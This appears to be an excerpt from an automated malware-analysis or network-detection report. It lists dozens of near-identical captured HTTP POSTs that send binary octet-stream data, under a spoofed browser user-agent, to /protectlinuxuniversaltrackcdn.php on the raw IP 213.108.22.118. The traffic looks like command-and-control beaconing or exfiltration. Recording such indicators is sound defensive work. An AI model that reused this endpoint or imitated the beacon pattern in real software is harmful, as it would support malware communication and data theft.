                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1404Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1416Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1404Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continue
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /protectlinuxuniversaltrackcdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 213.108.22.118Content-Length: 1428Expect: 100-continueConnection: Keep-Alive
